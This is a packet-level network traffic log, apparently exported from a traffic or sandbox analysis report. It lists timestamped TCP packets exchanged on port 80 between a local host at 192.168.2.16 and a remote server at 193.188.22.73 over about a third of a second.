                                                                                                                                                                                            Nov 18, 2024 21:01:18.382285118 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.382805109 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.382842064 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.382909060 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.403068066 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.403256893 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.403366089 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.404248953 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.404289007 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.404485941 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.405764103 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.405833960 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.433901072 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.434458017 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.434709072 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.435904980 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.436310053 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.436347008 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.436510086 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.438055038 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.438143969 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.438920975 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.438958883 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.439019918 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.440556049 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.440591097 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.440650940 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.442547083 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.442581892 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.442770004 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.444278002 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.444314957 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.444389105 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.464850903 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.465336084 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.465451002 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.465812922 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.465850115 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.465914011 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.467360973 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.467396975 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.467477083 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.473908901 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.474318027 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.474354982 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.474394083 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.475861073 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.475930929 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.476804972 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.476841927 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.476907015 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.478154898 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.478190899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.478250980 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.485980988 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.486301899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.486335039 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.486404896 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.488415003 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.488496065 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.488914967 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.489564896 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.489654064 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.491970062 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.492266893 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.492453098 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.492991924 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.493029118 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.493222952 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.494158030 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.494193077 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.494259119 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.496129036 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.496166945 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.496232033 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.496653080 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.496687889 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.496750116 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.497957945 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.497992992 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.498050928 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.499378920 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.499414921 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.499630928 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.500896931 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.500933886 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.500999928 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.502116919 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.502167940 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.502202988 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.502382994 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.503437042 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.503475904 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.503518105 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.504647970 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.504683971 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.504720926 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.505717993 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.505754948 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.505784035 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.505785942 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.505837917 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.538702965 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.538911104 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.538950920 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.539129019 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.540076017 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.540262938 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.540448904 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.547422886 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.547524929 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.547527075 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.547564030 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.547632933 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.548451900 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.548732996 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.548856020 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.549005032 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.549042940 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.549108982 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.549966097 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.550004005 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.550065994 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.550775051 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.550810099 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.550873041 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.551671982 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.551707983 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.551767111 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.552587986 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.552623987 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.552685976 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.553661108 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.553697109 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.553759098 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.554486036 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.554521084 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.554555893 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.554584980 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.555460930 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.555497885 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.555524111 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.556381941 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.556417942 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.556447983 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.557315111 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.557349920 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.557390928 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.558320045 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.558355093 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.558388948 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.558388948 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.558443069 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.559276104 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.559329033 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.559393883 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.560245991 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.560280085 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.560381889 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.561153889 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.561189890 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.561248064 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.561851025 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.561887026 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.561922073 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.561940908 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.562522888 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.562557936 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.562587023 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.563218117 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.563254118 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.563293934 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.563893080 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.563929081 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.563956976 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.564601898 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.564637899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.564661980 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.564673901 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.564737082 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.565248013 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.565283060 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.565345049 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.565934896 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.565970898 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.566030025 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.566658020 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.566694021 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.566757917 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.567329884 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.567365885 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.567400932 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.567440033 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.567958117 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.567996979 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.568012953 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.568736076 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.568772078 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.568805933 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.568809032 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.568862915 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.605433941 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.605532885 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.605572939 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.605746984 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.606561899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.606612921 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.606750965 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.606760025 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.606798887 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.606837988 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.607450008 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.607490063 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.607520103 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.608254910 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.608293056 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.608305931 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.608814001 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.608850956 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.608880997 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.608885050 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.608946085 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.609483004 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.609519958 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.609581947 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.610187054 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.610224009 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.610280991 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.610951900 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.610986948 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.611049891 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.611617088 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.611653090 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.611687899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.611711979 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.612262964 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.612299919 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.612322092 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.612826109 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.612860918 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.612889051 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.612896919 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.612953901 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.613775015 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.613811970 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.613847971 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.613878012 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.614526987 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.614562035 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.614587069 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.614617109 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.614655972 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.614677906 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.615329981 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.615367889 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.615390062 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.615403891 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.615458965 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.615621090 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.616442919 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.616481066 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.616516113 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.616544008 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.616554022 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.616607904 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.616998911 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.617036104 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.617072105 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.617089987 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.617746115 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.617804050 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.627789021 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.672339916 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.673252106 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.673302889 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.673341036 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.673360109 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.673377037 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.673413038 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.673425913 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.673476934 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.674282074 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.674319983 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.674355984 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.674382925 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.674753904 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.674789906 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.674817085 CET4994080192.168.2.16193.188.22.73
